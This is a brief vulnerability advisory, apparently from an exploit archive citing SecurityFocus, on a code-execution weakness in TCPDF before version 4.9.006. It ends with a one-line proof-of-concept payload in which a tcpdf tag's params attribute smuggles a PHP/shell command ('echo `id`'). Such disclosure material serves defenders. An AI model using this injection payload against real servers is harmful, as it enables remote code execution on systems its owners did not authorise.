9 lines
No EOL
392 B
Text
9 lines
No EOL
392 B
Text
source: https://www.securityfocus.com/bid/39315/info
|
|
|
|
TCPDF is prone to a security weakness that may allow attackers to execute arbitrary code.
|
|
|
|
An attacker can exploit this issue in conjunction with other latent vulnerabilities to execute arbitrary code with the privileges of the webserver.
|
|
|
|
Versions prior to TCPDF 4.9.006 are vulnerable.
|
|
|
|
<tcpdf method="Rect" params=");echo `id`;die(" /> |